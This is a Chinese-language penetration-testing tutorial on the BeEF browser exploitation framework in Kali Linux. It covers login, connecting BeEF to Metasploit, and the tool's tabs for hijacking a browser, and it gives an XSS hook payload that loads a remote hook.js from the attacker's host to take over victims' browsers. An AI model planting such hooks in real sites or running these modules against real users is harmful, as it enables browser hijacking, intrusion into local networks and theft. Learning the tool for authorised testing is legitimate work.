BeEF是瀏覽器攻擊框架的簡稱,是一款專注于瀏覽器端的滲透測試工具。
官網[http://beefproject.com](http://beefproject.com)
kali中已經內置了BeEF,直接啟動輸入beef/beef登錄即可。

根據提示,訪問UI界面。
然后將下面代碼輸入到存在XSS漏洞的地方hook一個瀏覽器:
`<script src="http://BeEF主機-IP:3000/hook.js"></script>`

如上圖,已經成功hook瀏覽器。
**連接metasploit:**
(此部分選自[limit_anonymous](https://blog.csdn.net/u013526533)的51cto博客
原文地址:https://blog.csdn.net/u013526533/article/details/52449964 )
要使用Metasploit豐富的攻擊模塊,需要做些配置
此時先確定以把更新源換為國內的:
> 進入目錄/etc/apt/sources.list
deb http://mirrors.ustc.edu.cn/kali kali-rolling main non-free contrib
deb-src http://mirrors.ustc.edu.cn/kali kali-rolling main non-free contrib
deb http://mirrors.ustc.edu.cn/kali-security kali-current/updates main contrib non-free
deb-src http://mirrors.ustc.edu.cn/kali-security kali-current/updates main contrib non-free
deb http://mirrors.aliyun.com/kali kali-rolling main non-free contrib
deb-src http://mirrors.aliyun.com/kali kali-rolling main non-free contrib
deb http://mirrors.tuna.tsinghua.edu.cn/kali kali-rolling main contrib non-free
deb-src https://mirrors.tuna.tsinghua.edu.cn/kali kali-rolling main contrib non-free
> 然后更新系統:
> apt-get update
> apt-get upgrade
> apt-get dist-upgrade
> reboot
重啟之后
先切換進BEEF的目錄下面:cd /usr/share/beef-xss/
切換進去之后,里面有個config.yaml文件,進行編輯
把metasploit功能模塊,enable設置為true
然后在當前目錄切換到:cd extensions/metasploit/
需要配置三個地方:
~~~
host:本機IP
callback host:本機IP
{os: 'custom',path: '/usr/share/metasploit-framework/'}
~~~
然后啟動msfconsole控制臺,輸入:load msgrpc ServerHost=IP Pass=abc123 這里的IP設置為你本機IP,不要設置為127.0.0.1
這時重新打開一個窗口切換到BEEF目錄下:`cd /usr/share/beef-xss/`
然后輸入`./beef`來啟動BEEF
之后顯示加載了292個metasploit模塊,然后打開beef就可以看到加載的metasploit模塊了
**關于BeEF的選項夾和功能**
main:在運行一些命令模塊后,顯示瀏覽器的信息
logs:顯示連接日志
commands:命令模塊執行功能的地方
> 每個命令模塊都有一個交通圖燈,用來指示以下內容:
> 命令模塊對目標進行操作,并且對目標不可見
> 命令模塊針對目標工作,但目標可以看到
> 該命令模塊還未對目標進行驗證
> 該命令模塊不針對此目標進行工作

XssRays: XssRays選項卡允許用戶檢查頁面的鏈接、表單和URI路徑是否容易受到XSS的攻擊。
Rider: Rider選項卡允許您為鉤狀瀏覽器提交任意的HTTP請求。
Network:網絡選項卡允許您與托管瀏覽器的本地網絡上的主機進行交互。
* * * * *
使用案例(給被劫持瀏覽器彈窗口):
`commands-Misc-Raw JavaScript-Execute`